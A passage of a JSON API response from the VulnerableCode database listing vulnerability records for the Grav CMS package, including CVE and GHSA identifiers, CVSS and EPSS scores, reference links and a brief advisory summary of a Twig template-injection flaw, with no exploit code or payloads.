kages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34253","GHSA-j3v8-v77f-fvgm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ya18-2867-f7ar"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52565?format=json","vulnerability_id":"VCID-hrz6-czbk-wbfv","summary":"Code injection in grav\nGrav is vulnerable to Server Side Template Injection via Twig. 
According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2073","reference_id":"","reference_type":"","scores":[{"value":"0.00213","scoring_system":"epss","scoring_elements":"0.43831","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2073"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"},{"reference_url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2073","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2073"},{"reference_url":"https://github.com/advisories/GHSA-cxgw-r5jg-7xwq","reference_id":
"GHSA-cxgw-r5jg-7xwq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxgw-r5jg-7xwq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/89049?format=json","purl":"pkg:composer/getgrav/grav@1.7.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-ppnh-1zmd-t3c5"},{"vulnerability":"VCID-q9c3-abt1-2kdf"},{"vulnerability":"VCID-rs42-h8k4-zydz"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"},{"vulnerability":"VCID-ya18-2867-f7ar"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.34"}],"aliases":["CVE-2022-2073","GHSA-cxgw-r5jg-7xwq"],"risk_score":null,"exploitability":null,"weight
ed_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hrz6-czbk-wbfv"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.34"}